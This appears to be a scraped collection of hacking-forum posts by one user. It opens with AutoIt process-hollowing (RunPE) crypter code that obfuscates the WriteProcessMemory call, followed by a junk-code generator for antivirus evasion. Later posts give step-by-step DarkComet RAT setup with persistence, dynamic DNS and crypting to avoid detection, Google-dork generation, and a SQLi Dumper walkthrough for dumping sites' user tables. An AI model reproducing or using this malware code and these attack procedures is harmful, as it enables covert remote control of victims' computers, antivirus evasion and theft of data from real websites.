"word MajorSubsystemVersion;" & _ "word MinorSubsystemVersion;" & _ "dword Win32VersionValue;" & _ "dword SizeOfImage;" & _ "dword SizeOfHeaders;" & _ "dword CheckSum;" & _ "word Subsystem;" & _ "word DllCharacteristics;" & _ "uint64 SizeOfStackReserve;" & _ "uint64 SizeOfStackCommit;" & _ "uint64 SizeOfHeapReserve;" & _ "uint64 SizeOfHeapCommit;" & _ "dword LoaderFlags;" & _ "dword NumberOfRvaAndSizes", _ $pPointer) ; Move pointer $pPointer += 112 ; size of $tIMAGE_OPTIONAL_HEADER Else DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(6, 0, 0) ; incompatible versions EndIf ; Extract entry point address Local $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") ; if loaded binary image would start executing at this address ; And other interesting informations Local $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") Local $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") ; address of the first byte of the image when it's loaded in memory Local $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage") ; the size of the image including all headers ; Move pointer $pPointer += 8 ; skipping IMAGE_DIRECTORY_ENTRY_EXPORT $pPointer += 8 ; size of $tIMAGE_DIRECTORY_ENTRY_IMPORT $pPointer += 24 ; skipping IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY ; Base Relocation Directory Local $tIMAGE_DIRECTORY_ENTRY_BASERELOC = DllStructCreate("dword VirtualAddress; dword Size", $pPointer) ; Collect data Local $pAddressNewBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "VirtualAddress") Local $iSizeBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "Size") Local $fRelocatable If $pAddressNewBaseReloc And $iSizeBaseReloc Then $fRelocatable = True If Not $fRelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF) ; nothing can be done here ; Move pointer $pPointer += 88 ; size of the structures before IMAGE_SECTION_HEADER (16 of them). #Region 6. ALLOCATE 'NEW' MEMORY SPACE Local $fRelocate Local $pZeroPoint If $fRelocatable Then ; If the module can be relocated then allocate memory anywhere possible $pZeroPoint = _RunBinary_AllocateExeSpace($hProcess, $iOptionalHeaderSizeOfImageNEW) ; In case of failure try at original address If @error Then $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error Then _RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW) ; Try now $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error Then ; Return special error number: DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(101, 1, 0) EndIf EndIf EndIf $fRelocate = True Else ; And if not try where it should be $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error Then _RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW) ; Try now $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW) If @error Then ; Return special error number: DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(101, 0, 0) EndIf EndIf EndIf ; If there is new ImageBase value, save it DllStructSetData($tIMAGE_OPTIONAL_HEADER, "ImageBase", $pZeroPoint) #Region 7. CONSTRUCT THE NEW MODULE ; Allocate enough space (in our space) for the new module Local $tModule = DllStructCreate("byte[" & $iOptionalHeaderSizeOfImageNEW & "]") ; Get pointer Local $pModule = DllStructGetPtr($tModule) ; Headers Local $tHeaders = DllStructCreate("byte[" & $iOptionalHeaderSizeOfHeadersNEW & "]", $pHEADERS_NEW) ; Write headers to $tModule DllStructSetData($tModule, 1, DllStructGetData($tHeaders, 1)) ; Write sections now. $pPointer is currently in place of sections Local $tIMAGE_SECTION_HEADER Local $iSizeOfRawData, $pPointerToRawData Local $iVirtualAddress, $iVirtualSize Local $tRelocRaw ; Loop through sections For $i = 1 To $iNumberOfSections $tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & _ "dword UnionOfVirtualSizeAndPhysicalAddress;" & _ "dword VirtualAddress;" & _ "dword SizeOfRawData;" & _ "dword PointerToRawData;" & _ "dword PointerToRelocations;" & _ "dword PointerToLinenumbers;" & _ "word NumberOfRelocations;" & _ "word NumberOfLinenumbers;" & _ "dword Characteristics", _ $pPointer) ; Collect data $iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData") $pPointerToRawData = $pHEADERS_NEW + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData") $iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress") $iVirtualSize = DllStructGetData($tIMAGE_SECTION_HEADER, "UnionOfVirtualSizeAndPhysicalAddress") If $iVirtualSize And $iVirtualSize < $iSizeOfRawData Then $iSizeOfRawData = $iVirtualSize ; If there is data to write, write it If $iSizeOfRawData Then DllStructSetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pModule + $iVirtualAddress), 1, DllStructGetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pPointerToRawData), 1)) EndIf ; Relocations If $fRelocate Then If $iVirtualAddress <= $pAddressNewBaseReloc And $iVirtualAddress + $iSizeOfRawData > $pAddressNewBaseReloc Then $tRelocRaw = DllStructCreate("byte[" & $iSizeBaseReloc & "]", $pPointerToRawData + ($pAddressNewBaseReloc - $iVirtualAddress)) EndIf EndIf ; Move pointer $pPointer += 40 ; size of $tIMAGE_SECTION_HEADER structure Next ; Fix relocations If $fRelocate Then _RunBinary_FixReloc($pModule, $tRelocRaw, $pZeroPoint, $pOptionalHeaderImageBaseNEW, $iMagic = 523) ; Write newly constructed module to allocated space inside the $hProcess $aCall = DllCall("kernel32.dll", "bool", _RunBinary_LeanAndMean(), _ "handle", $hProcess, _ "ptr", $pZeroPoint, _ "ptr", $pModule, _ "dword_ptr", $iOptionalHeaderSizeOfImageNEW, _ "dword_ptr*", 0) ; Check for errors or failure If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(7, 0, 0) ; failure while writting new module binary EndIf #Region 8. PEB ImageBaseAddress MANIPULATION ; PEB structure definition Local $tPEB = DllStructCreate("byte InheritedAddressSpace;" & _ "byte ReadImageFileExecOptions;" & _ "byte BeingDebugged;" & _ "byte Spare;" & _ "ptr Mutant;" & _ "ptr ImageBaseAddress;" & _ "ptr LoaderData;" & _ "ptr ProcessParameters;" & _ "ptr SubSystemData;" & _ "ptr ProcessHeap;" & _ "ptr FastPebLock;" & _ "ptr FastPebLockRoutine;" & _ "ptr FastPebUnlockRoutine;" & _ "dword EnvironmentUpdateCount;" & _ "ptr KernelCallbackTable;" & _ "ptr EventLogSection;" & _ "ptr EventLog;" & _ "ptr FreeList;" & _ "dword TlsExpansionCounter;" & _ "ptr TlsBitmap;" & _ "dword TlsBitmapBits[2];" & _ "ptr ReadOnlySharedMemoryBase;" & _ "ptr ReadOnlySharedMemoryHeap;" & _ "ptr ReadOnlyStaticServerData;" & _ "ptr AnsiCodePageData;" & _ "ptr OemCodePageData;" & _ "ptr UnicodeCaseTableData;" & _ "dword NumberOfProcessors;" & _ "dword NtGlobalFlag;" & _ "byte Spare2[4];" & _ "int64 CriticalSectionTimeout;" & _ "dword HeapSegmentReserve;" & _ "dword HeapSegmentCommit;" & _ "dword HeapDeCommitTotalFreeThreshold;" & _ "dword HeapDeCommitFreeBlockThreshold;" & _ "dword NumberOfHeaps;" & _ "dword MaximumNumberOfHeaps;" & _ "ptr ProcessHeaps;" & _ "ptr GdiSharedHandleTable;" & _ "ptr ProcessStarterHelper;" & _ "ptr GdiDCAttributeList;" & _ "ptr LoaderLock;" & _ "dword OSMajorVersion;" & _ "dword OSMinorVersion;" & _ "dword OSBuildNumber;" & _ "dword OSPlatformId;" & _ "dword ImageSubSystem;" & _ "dword ImageSubSystemMajorVersion;" & _ "dword ImageSubSystemMinorVersion;" & _ "dword GdiHandleBuffer[34];" & _ "dword PostProcessInitRoutine;" & _ "dword TlsExpansionBitmap;" & _ "byte TlsExpansionBitmapBits[128];" & _ "dword SessionId") ; Fill the structure $aCall = DllCall("kernel32.dll", "bool", "ReadProcessMemory", _ "ptr", $hProcess, _ "ptr", $pPEB, _ ; pointer to PEB structure "ptr", DllStructGetPtr($tPEB), _ "dword_ptr", DllStructGetSize($tPEB), _ "dword_ptr*", 0) ; Check for errors or failure If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(8, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure EndIf ; Change base address within PEB DllStructSetData($tPEB, "ImageBaseAddress", $pZeroPoint) ; Write the changes $aCall = DllCall("kernel32.dll", "bool", _RunBinary_LeanAndMean(), _ "handle", $hProcess, _ "ptr", $pPEB, _ "ptr", DllStructGetPtr($tPEB), _ "dword_ptr", DllStructGetSize($tPEB), _ "dword_ptr*", 0) ; Check for errors or failure If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(9, 0, 0) ; failure while changing base address EndIf #Region 9. NEW ENTRY POINT ; Entry point manipulation Switch $iRunFlag Case 1 DllStructSetData($tCONTEXT, "Eax", $pZeroPoint + $iEntryPointNEW) Case 2 DllStructSetData($tCONTEXT, "Rcx", $pZeroPoint + $iEntryPointNEW) Case 3 ; FIXME - Itanium architecture EndSwitch #Region 10. SET NEW CONTEXT ; New context: $aCall = DllCall("kernel32.dll", "bool", "SetThreadContext", _ "handle", $hThread, _ "ptr", DllStructGetPtr($tCONTEXT)) If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(10, 0, 0) ; SetThreadContext function or call to it failed EndIf #Region 11. RESUME THREAD ; And that's it!. Continue execution: $aCall = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $hThread) ; Check for errors or failure If @error Or $aCall[0] = -1 Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(11, 0, 0) ; ResumeThread function or call to it failed EndIf #Region 12. CLOSE OPEN HANDLES AND RETURN PID DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hProcess) DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hThread) ; All went well. Return new PID: Return DllStructGetData($tPROCESS_INFORMATION, "ProcessId") EndFunc Func _RunBinary_LeanAndMean() Local $aArr[18] = ["W", "r", "i", "t", "e", "P", "r", "o", "c", "e", "s", "s", "M", "e", "m", "o", "r", "y"], $sOut For $sChar In $aArr $sOut &= $sChar Next Return $sOut EndFunc Func _RunBinary_FixReloc($pModule, $tData, $pAddressNew, $pAddressOld, $fImageX64) Local $iDelta = $pAddressNew - $pAddressOld ; dislocation value Local $iSize = DllStructGetSize($tData) ; size of data Local $pData = DllStructGetPtr($tData) ; addres of the data structure Local $tIMAGE_BASE_RELOCATION, $iRelativeMove Local $iVirtualAddress, $iSizeofBlock, $iNumberOfEntries Local $tEnries, $iData, $tAddress Local $iFlag = 3 + 7 * $fImageX64 ; IMAGE_REL_BASED_HIGHLOW = 3 or IMAGE_REL_BASED_DIR64 = 10 While $iRelativeMove < $iSize ; for all data available $tIMAGE_BASE_RELOCATION = DllStructCreate("dword VirtualAddress; dword SizeOfBlock", $pData + $iRelativeMove) $iVirtualAddress = DllStructGetData($tIMAGE_BASE_RELOCATION, "VirtualAddress") $iSizeofBlock = DllStructGetData($tIMAGE_BASE_RELOCATION, "SizeOfBlock") $iNumberOfEntries = ($iSizeofBlock - 8) / 2 $tEnries = DllStructCreate("word[" & $iNumberOfEntries & "]", DllStructGetPtr($tIMAGE_BASE_RELOCATION) + 8) ; Go through all entries For $i = 1 To $iNumberOfEntries $iData = DllStructGetData($tEnries, 1, $i) If BitShift($iData, 12) = $iFlag Then ; check type $tAddress = DllStructCreate("ptr", $pModule + $iVirtualAddress + BitAND($iData, 0xFFF)) ; the rest of $iData is offset DllStructSetData($tAddress, 1, DllStructGetData($tAddress, 1) + $iDelta) ; this is what's this all about EndIf Next $iRelativeMove += $iSizeofBlock WEnd Return 1 ; all OK! EndFunc Func _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pAddress, $iSize) ; Allocate Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _ "handle", $hProcess, _ "ptr", $pAddress, _ "dword_ptr", $iSize, _ "dword", 0x1000, _ ; MEM_COMMIT "dword", 64) ; PAGE_EXECUTE_READWRITE ; Check for errors or failure If @error Or Not $aCall[0] Then ; Try differently $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _ "handle", $hProcess, _ "ptr", $pAddress, _ "dword_ptr", $iSize, _ "dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE "dword", 64) ; PAGE_EXECUTE_READWRITE ; Check for errors or failure If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate EndIf Return $aCall[0] EndFunc Func _RunBinary_AllocateExeSpace($hProcess, $iSize) ; Allocate space Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _ "handle", $hProcess, _ "ptr", 0, _ "dword_ptr", $iSize, _ "dword", 0x3000, _ ; MEM_COMMIT|MEM_RESERVE "dword", 64) ; PAGE_EXECUTE_READWRITE ; Check for errors or failure If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Unable to allocate Return $aCall[0] EndFunc Func _RunBinary_UnmapViewOfSection($hProcess, $pAddress) DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", _ "ptr", $hProcess, _ "ptr", $pAddress) ; Check for errors only If @error Then Return SetError(1, 0, 0) ; Failure Return 1 EndFunc Func _RunBinary_IsWow64Process($hProcess) Local $aCall = DllCall("kernel32.dll", "bool", "IsWow64Process", _ "handle", $hProcess, _ "bool*", 0) ; Check for errors or failure If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; Failure Return $aCall[2] EndFunc The junk Function : #cs ---------------------------------------------------------------------------- AutoIt Version: 3.3.14.2 Author: CarrotInBLack Script Function: Create a junk code for your autoIT script very easy With: - _JunkCreate($Value) EXAMPLE: _JunkCreate(10) will create 10 random junk codes (functions, variables, IF/ELSE and For) _RandomString() Creates a Random string with 10-15 caracters #ce ---------------------------------------------------------------------------- Func _RandomVersion() $rVersion = "" Dim $aRr[3] $digits = Random(2, 4, 1) For $i = 1 To $digits $aRr[0] = Chr(Random(48, 57, 1)) & "." $aRr[1] = Chr(Random(48, 57, 1)) & "." $aRr[2] = Chr(Random(48, 57, 1)) & "." $arR2 = Chr(Random(48, 57, 1)) $rVersion &= $aRr[Random(0, 2, 1)] & $arR2 Next Return $rVersion EndFunc Func _RandomString() $rString = "" Dim $aRr[3] $digits = Random(10, 15, 1) For $i = 1 To $digits $aRr[0] = Chr(Random(65, 90, 1)) $aRr[1] = Chr(Random(97, 122, 1)) $aRr[2] = Chr(Random(48, 57, 1)) $rString &= $aRr[Random(0, 2, 1)] Next Return $rString EndFunc Func _JunkVariables() $var = "" $varval = "" Dim $aRr[3] $digits = Random(10, 15, 1) For $i = 1 To $digits $aRr[0] = Chr(Random(65, 90, 1)) $aRr[1] = Chr(Random(97, 122, 1)) $aRr[2] = Chr(Random(48, 57, 1)) $var &= $aRr[Random(0, 2, 1)] $varval &= $aRr[Random(0, 2, 1)] $variable = '$' & $var & ' = ' & '"' & $varval & '"' & @CRLF Next Return $variable EndFunc Func _JunkFor() $rString = _RandomString() $variable = _JunkVariables() $JunkFor = "For $" & $rString & " = 1 To " & Random(1, 15) & @CRLF & " " & $variable & "Next" & @CRLF Return $JunkFor EndFunc Func _JunkIfElse() $rString = _RandomString() $rString2 = _RandomString() $variable = _JunkVariables() $JunkIf = 'If ' & '"' & $rString & '" == "' & $rString2 & '" Then' & @CRLF & ' ' & $variable & 'EndIf' & @CRLF Return $JunkIf Endfunc Func _FunJunk($Value) $JunkFun = "" Dim $Round[4] For $i = 1 To $Value $Round[0] = _JunkVariables() $Round[2] = _JunkFor() $Round[3] = _JunkIfElse() $JunkFun &= $Round[Random(0, 3, 1)] Next Return $JunkFun EndFunc Func _RanParameters($Value) $JunkParam = "" For $i = 1 To $Value $JunkParam = "$" & _RandomString() & ", " Next Return $JunkParam EndFunc Func _JunkFunc() $FuncName = "" $Parameters = "" $Lparam = "" Dim $aRr[3] $digits = Random(7, 10, 1) $digits2 = Random(2, 5, 1) $digits3 = Random(1, 3, 1) $lastP = _RandomString() $Lparam &= "$" & $lastP $Parameters &= _RanParameters($digits3) For $i = 1 To $digits $aRr[0] = Chr(Random(65, 90, 1)) $aRr[1] = Chr(Random(97, 122, 1)) $aRr[2] = Chr(Random(48, 57, 1)) $FuncName &= $aRr[Random(0, 2, 1)] $RanFun = _FunJunk($digits2) $Function = 'Func ' & '_' & $FuncName & '(' & $Parameters & $Lparam & ')' & @CRLF & $RanFun & @CRLF & 'EndFunc' & @CRLF Next Return $Function EndFunc Func _JunkCreate($Value) $JunkCode = "" Dim $Round[4] For $i = 1 To $Value $Round[0] = _JunkVariables() $Round[1] = _JunkFunc() $Round[2] = _JunkFor() $Round[3] = _JunkIfElse() $JunkCode &= $Round[Random(0, 3, 1)] Next Return $JunkCode EndFunc This script includes: -junk code generation -icon changer -file informations randomizing -randomizing the stubs variables and function names
  2. Backtracking

    DarkComet

    Note: In this format, the RAT program will quite easily be detected by anti-virus software. In order to evade such detection you will have to crypto the DarkComet RAT. It must become undetectable in order to use stealthily. Or, the attacker might install such a program and add exceptions to the anti-virus. The newest versions are always the most stable. Let’s say you use DarkComet 3.2. DarkComet 3.2 will be quite old by the writing of this blog. The system functions may have changed. DarkCoderSc has updated it to DarkComet 5.3.2 with the latest functions, it’s like buying a can of Pepsi then finding it has gone-off. Here is the tutorial on how to setup DarkComet 5.3.1 Go to the DarkComet website ([Hidden Content]). I would not get this RAT from anywhere else, lest it be crawling with gremlins. At the top, you will see a list of items. Click Downloads. Next there will be a list of DarkComet-RAT product versions. Click the top one. When you click Download, you will see three boxes. Tick them. Click Download. Open the DarkComet RAR (You need WinRAR) It should look like this: Make a folder on your desktop. Name it anything you want. Drag the items from the WinRAR folder to the Tutorial folder at your Desktop. Now, everything should be there like this: Open DarkComet.exe (Run as Administrator) A TOS should show up. Tick the box saying ‘Do not display again the EULA‘ that is located at the bottom left. Click ‘I accept‘ At the bottom left, it will show up a Help Screen, tick ‘Do not show at startup‘ then click ‘Fine‘ Click DarkComet-RAT at the top left. Click ‘Listen to new port (+Listen)‘ A new window should open, put in your Port then tick ‘Try to forward automaticaly (UPNP)‘ IN this case, I will do port 70 so I put that in, tick ‘Try to forward automatically (UpNP)‘ and click Listen. Move over to ‘Socket / Net‘ located at the very end of the top left border. You should see something like this: 70 may not be your port, your port that you added in ‘Listen to new port‘ will be displayed, not specifically 70. Go to ‘www.canyouseeme.org‘ Put in the port that you are listened on. If all went well, it should look like this: Now, click DarkComet-RAT again and click Server Module, then click Full Editor (Expert) Name your Security Password anything you like, then click the Mutex a few times. We then have the Main Settings done. Make sure you untick FWB (Firewall Bypass) Go to Network Settings. Now, go to [Hidden Content] and register Click Free DNS Put in whatever you want for it. Make sure the email is valid because we will need it to validate. (if you don’t want to give your email, get a temp email at 10minutemail.com) Sign in now. Now, at the Body you will see a list of options, click ‘Add Host’ Copy the settings: Leave IP Address, as that will show as Default your IP address. Click Create Host. Go back to your DarkComet and put in the Ip/DNS and Port (DNS for the NO-IP you made a second ago and Port for the one you listened on!) Then click ‘Add‘ and go to Module Startup. Tick the ‘Start the stub with windows (module startup)’ Then leave everything but ‘Persistance installation ( always come back )‘ Tick that. Now, it should look like this: Now go to ‘Stub Finalization‘ at the end. If you are going to get it crypted then don’t tick UPX (Ultimate Packer Executable) but if you are, I would leave it off and just have it on No compression. Now tick the ‘Save the profile when stub succesfully generated’ and Build the Stub. Now there is one last thing. Go to the Client Settings in DarkComet-RAT and then Click NO-IP Updater Then put in the NO-IP host, Username and Password, then tick ‘Auto update your no-ip dns when your IP change‘ Now, run the stub that you generated in a Sandbox to test, and you should show up! Here now, we have run through the entire thorough setup for DarkComet. Even your kid brother could follow this tutorial. Now what you need to do is some research into how to encrypt the EXE, so it can be installed remotely without an antivirus putting up a fuss. I know Metasploit has some pretty good encryption in it’s framework. I would start there. Watch out for others telling you they will encrypt it for you. This is usually a trick to just pack their own RAT into your stuff!
  3. Backtracking

    Dork Generator

    Dork Generator link : [Hidden Content] ================================= DORKS ================================= When you open up the Dork generator tool there is 3 fields to fill out. Names/Keywords, Page Format, Page Type -{Names Of Pages}- In this you put keywords related to the category of the sites your looking for you can do this manually but I would recommend using [Hidden Content] -{Page Format}- In this field most people just put .php? .asp? .aspx? .html? but if you have a lot of time to scan and you want HQ dorks You can add a lot of others like .cfm? .jsf? .htm? .tss? .file? .raw? -{Page Type}- I usually just put code_no= code= product= designer= framecode= idproduct= intCatalogID= intProdId= item= jobid= item_id= id= topic= NewsId= langid= article_id= cid= cartID= shopid= -{Exporting}- In the bottom right just click Generate Dorks it could take a while Once it is done it will create a file in the directory the tool is in
  4. Backtracking

    SQLi Dumper

    ================================= Requirements ================================= ~ Have a brain ================================= What will be in this post ================================= ~ How to setup SQLI Dumper ~ How to make your own HQ dorks ~ How to use SQLI Dumper to inject sites ================================= Downloads ================================= SQLI Dumper [Hidden Content] ================================= SQLI Dumper ================================= -{Setting Up}- go to the Keygen folder and run the file Than copy the Key and run the SQLI dumper file and use the key -{Scanning}- Here is where you get to use the DORKS you made earlier go into the file that the dorks where generated in and copy them all Now open up the SQLI Dumper tool in the top left click "Online Scanner" Than under that click URL's Queue Now in the big text field in the top middle paste in all the Dorks Than go to the top right to "Start Scanner" To the left of that make sure that number is 10 Than click Start Scanner than "URL's Only" Under "Online Scanner" and above URL's Queue it will say Queue than a number That number is how many sites are possibly exploitable -{Exploitables}- Now after you have finished all the scanning hit cancel in bottom right And click on "Exploitables" to the right of "URL's Queue" In top right there is "Start Exploiter" to the right of that change that number to 30 Than click "Start Exploiter" and wait for that to finish Once it is at 100% you hit cancel -{Injectables}- Now click "Injectables" to the right of "Exploitables" And in top right there is "Start Analyzer" change that number to the left to 20 Than click "Start Analyzer" After that is done click cancel -{Data Dumper}- Now after you have some sites listed off in injectables you are ready to actually preform the attack Find the site you want to start to attack and right click on it and hit "New Dumper" or "Go to Dumper" Once in the Data Dumper click Get Databases on top of text field Inside the text field there should be at least one database click on that and hit "Get Tables" After all that loads in look for useful tables usually it will be named "users" Now click on whatever table you want to get the info out of and hit "Get Columns" Should list off a bunch of different info fields check the boxes next to the ones you want to export and hit "Dump Data" in top right of the text field Finally after that is done click Export Data click "Start"and save to where you want it If was helpful slap me a rating ?
  5. Backtracking

    Rules

    Agree
  6. Backtracking

    Backtracking

    Name : Backtracking Age : 23 Why did you come to this forum? : Exploit What do you think you learn on the forum? : something useful What do you think you give to the forum? : Trainner What's your best specialty : Crypt
×